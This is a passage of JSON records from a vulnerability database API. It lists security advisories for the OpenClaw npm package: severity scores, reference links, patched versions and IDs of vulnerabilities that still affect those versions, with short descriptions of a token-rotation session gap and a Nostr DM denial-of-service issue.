"scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41378", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41378" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "8.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch" }, { "reference_url": "https://github.com/advisories/GHSA-gjm7-hw8f-73rq", "reference_id": "GHSA-gjm7-hw8f-73rq", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gjm7-hw8f-73rq" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41378", "GHSA-gjm7-hw8f-73rq" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yp2w-pc58-9bf6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89997?format=api", "vulnerability_id": "VCID-ywrn-52gx-f3ad", "summary": "OpenClaw: Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation\n## Summary\nGateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 rotates device tokens without disconnecting already-authenticated WebSocket sessions, which is a real but post-compromise revocation gap.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `91f7a6b0fd67b703897e6e307762d471ca09333d` — 2026-03-31T09:05:34+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41356", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10395", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10436", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10417", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41356" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41356", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41356" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-in-device-token-rotate", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-in-device-token-rotate" }, { "reference_url": "https://github.com/advisories/GHSA-rfqg-qgf8-xr9x", "reference_id": "GHSA-rfqg-qgf8-xr9x", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rfqg-qgf8-xr9x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41356", "GHSA-rfqg-qgf8-xr9x" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "4.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ywrn-52gx-f3ad" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89498?format=api", "vulnerability_id": "VCID-z3rc-xpx7-fkcu", "summary": "Duplicate Advisory: OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-65h8-27jh-q8wv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cryptographic and dispatch operations on inbound Nostr direct messages before enforcing sender and pairing policy validation. Attackers can trigger unauthorized pre-authentication computation by sending crafted DM messages, enabling denial of service through resource exhaustion.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling" }, { "reference_url": "https://github.com/advisories/GHSA-2j53-2c28-g9v2", "reference_id": "GHSA-2j53-2c28-g9v2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2j53-2c28-g9v2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api", "purl": "pkg:npm/openclaw@2026.3.22", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-26sv-grsd-abcw" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": 